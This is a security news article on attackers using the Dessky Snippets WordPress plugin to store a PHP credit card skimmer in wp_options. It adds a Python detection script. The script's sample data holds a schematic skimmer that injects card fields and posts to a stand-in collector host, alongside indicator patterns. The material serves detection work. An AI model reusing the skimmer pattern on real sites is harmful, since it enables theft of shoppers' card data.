Unknown threat actors abuse a legitimate WordPress code snippet plugin to steal credit card data. Stay vigilant against malicious code snippets.
Unknown threat actors abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites
Unknown threat actors have recently been observed abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code into victim sites. The campaign, which Sucuri discovered on May 11, 2024, involves a WordPress plugin called Dessky Snippets. The plugin, which has over 200 active installations, lets site owners add custom PHP code to their websites. The plugin itself is not being exploited: it does exactly what it is designed to do, but on behalf of an attacker who already holds administrator access to the site.
These attacks typically begin with a known, unpatched vulnerability in another WordPress plugin or with easily guessed credentials, either of which gives the attacker administrator access to the target site. With that access, the attackers install further plugins, both legitimate and malicious, to entrench themselves. In this campaign the Dessky Snippets plugin is used to load a server-side PHP credit card skimmer onto compromised sites and steal payment data. Because the skimmer runs in PHP on the server rather than as JavaScript in the visitor's browser, tools that only inspect the client-side scripts a page serves will not see it.
According to security researcher Ben Martin, the malicious code is saved in the dnsp_settings option in the WordPress wp_options table rather than in a file on disk, so integrity checks that only compare the plugin and theme directories against known-good copies will not find it. Its purpose is to modify the WooCommerce checkout by manipulating the billing form and injecting its own code. The injected code adds several new fields to the billing form that request card details: name, address, card number, expiry date and Card Verification Value (CVV). The stolen details are then sent to a URL the attackers control.
One notable aspect of this campaign is that the fields of the malicious overlay have their autocomplete attribute disabled, specifically set to autocomplete="off". This stops the browser from offering to autofill saved payment details into the fields, which reduces the chance that the browser draws the user's attention to them. Because the fields stay blank until the user fills them in by hand, they look like ordinary inputs that the transaction requires, which lowers suspicion.
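The two indicators described above, the PHP stored in a snippet plugin's option row and the extra autocomplete="off" card fields in the rendered checkout, are what a responder would check for first. The script below is an added example written for this article, not Sucuri's tooling and not code from the Dessky Snippets plugin. It scans (option_name, option_value) rows exported from wp_options for PHP that behaves like the skimmer described, and parses checkout HTML for card-like inputs with autocomplete="off". The indicator patterns, the reporting threshold, the sample rows and the WooCommerce hook name used in the sample are assumptions constructed for illustration.

```python
"""Triage helper added for this article (not Sucuri's tooling or plugin code).
Scans wp_options rows for PHP behaving like the skimmer described and checks
checkout HTML for card fields with autocomplete="off". Patterns, thresholds
and sample data are assumptions constructed for illustration."""
import re
from html.parser import HTMLParser

# Options under which code-snippet plugins persist user-supplied PHP;
# dnsp_settings is the Dessky Snippets option named in the report.
SNIPPET_OPTION_NAMES = {"dnsp_settings"}

# (pattern, reason) pairs built from the behaviours the report describes: hooking
# the WooCommerce checkout, adding card fields, disabling autocomplete, posting
# the captured data to a fixed URL. Constructed for this example.
INDICATORS = [
    (re.compile(r"woocommerce_\w*checkout\w*", re.I), "hooks the WooCommerce checkout"),
    (re.compile(r"autocomplete\s*=\s*\\?[\"']?off", re.I), "sets autocomplete=off"),
    (re.compile(r"(cvv|cvc|card_?number|expiry|exp_?date)", re.I), "names card fields"),
    (re.compile(r"\b(curl_init|file_get_contents|wp_remote_post|fsockopen)\s*\(", re.I),
     "makes an outbound request"),
    (re.compile(r"https?://[^\s\"'\\]+", re.I), "contains a hard-coded URL"),
    (re.compile(r"\b(base64_decode|eval|gzinflate|str_rot13)\s*\(", re.I),
     "uses obfuscation or dynamic code"),
]


def scan_value(value: str) -> list[str]:
    """Return the reasons one option value looks like a PHP skimmer."""
    return [reason for pattern, reason in INDICATORS if pattern.search(value)]


def scan_options(rows, threshold: int = 3) -> dict[str, list[str]]:
    """Return {option_name: reasons} for rows worth a manual look.

    A row stored by a known snippet plugin is reported as soon as it carries PHP
    or any indicator; other rows only when `threshold` indicators co-occur, so
    ordinary values such as the site URL stay quiet.
    """
    findings: dict[str, list[str]] = {}
    for name, value in rows:
        reasons = scan_value(value)
        if name in SNIPPET_OPTION_NAMES and "<?php" in value:
            reasons.insert(0, "PHP stored by a code-snippet plugin")
        if (name in SNIPPET_OPTION_NAMES and reasons) or len(reasons) >= threshold:
            findings[name] = reasons
    return findings


CARD_FIELD_NAME = re.compile(r"(card|cvv|cvc|exp)", re.I)

class _BillingFieldParser(HTMLParser):
    """Collect <input> names that look like card fields and carry autocomplete="off"."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attr = dict(attrs)
        name = attr.get("name") or attr.get("id") or ""
        if CARD_FIELD_NAME.search(name) and (attr.get("autocomplete") or "").lower() == "off":
            self.hits.append(name)


def suspicious_billing_fields(html: str) -> list[str]:
    """Return card-like inputs with autocomplete="off". Gateways normally render
    card entry in hosted fields or an iframe, so plain card inputs are the anomaly."""
    parser = _BillingFieldParser()
    parser.feed(html)
    return parser.hits


# Constructed wp_options rows. The dnsp_settings value is a schematic stand-in for
# the stored snippet, not the real malware; the hook name is assumed for illustration.
SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    ("theme_mods_storefront", 'a:1:{s:8:"logo_url";s:33:"https://shop.example/checkout.png";}'),
    ("dnsp_settings",
     '<?php add_action("woocommerce_after_checkout_billing_form", function () {'
     ' echo \'<input name="billing_card_number" autocomplete="off">\';'
     ' echo \'<input name="billing_cvv" autocomplete="off">\'; });'
     ' add_action("woocommerce_checkout_process", function () {'
     ' $ch = curl_init("https://collector.example/in.php"); curl_exec($ch); });'),
]

# Constructed checkout fragment: the last three inputs are the injected ones.
SAMPLE_CHECKOUT_HTML = """<form name="checkout" class="checkout woocommerce-checkout">
  <input type="text" name="billing_first_name" autocomplete="given-name">
  <input type="email" name="billing_email" autocomplete="email">
  <input type="text" name="billing_card_number" autocomplete="off">
  <input type="text" name="billing_expiry" autocomplete="off">
  <input type="text" name="billing_cvv" autocomplete="off">
</form>"""

if __name__ == "__main__":
    for option, reasons in scan_options(SAMPLE_ROWS).items():
        print(f"{option}: {', '.join(reasons)}")
    print("injected card fields:", suspicious_billing_fields(SAMPLE_CHECKOUT_HTML))
```

On a live site the rows can be pulled with WP-CLI (`wp option get dnsp_settings`, or a query against wp_options for any option whose value contains `<?php`) and the checkout HTML fetched as an anonymous visitor, since the injected fields only appear on the rendered page. The threshold is deliberately forgiving for rows that do not belong to a snippet plugin; a site URL or a theme setting with a single URL in it is not worth an alert, whereas PHP in a snippet plugin's option that hooks the checkout and makes an outbound request is.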
It is worth noting that this is not the first time threat actors have exploited legitimate code snippet plugins for malicious purposes. In a previous incident, Sucuri uncovered the abuse of the WPCode code snippet plugin. In that case, the attackers injected malicious JavaScript code into WordPress sites, redirecting site visitors to VexTrio domains.
These incidents underline the need for basic hygiene on WordPress sites. Keep plugins and themes updated to their latest versions, because the initial foothold in this campaign comes from vulnerabilities for which patches already exist, and remove plugins that are no longer used. Use strong, unique passwords for every account associated with the site, and review the list of administrator accounts and installed plugins regularly: an unfamiliar code snippet plugin, or a stored snippet that nobody on the team wrote, is a sign of compromise rather than a configuration oddity.
Website administrators should also consider a web application firewall (WAF) as an additional layer of protection. A WAF can block the exploitation attempts and credential-guessing traffic that give attackers their initial administrator access. It is less help once an attacker holds a valid admin session, since saving a snippet through the plugin's own settings page looks, from the WAF's point of view, like a legitimate request; catching that stage means monitoring plugin installations and changes to the wp_options table.
The recent campaign involving the abuse of lesser-known code snippet plugins for WordPress serves as a reminder of the ongoing threats faced by website owners. By staying vigilant and implementing robust security measures, site administrators can better protect their websites and the sensitive data of their users.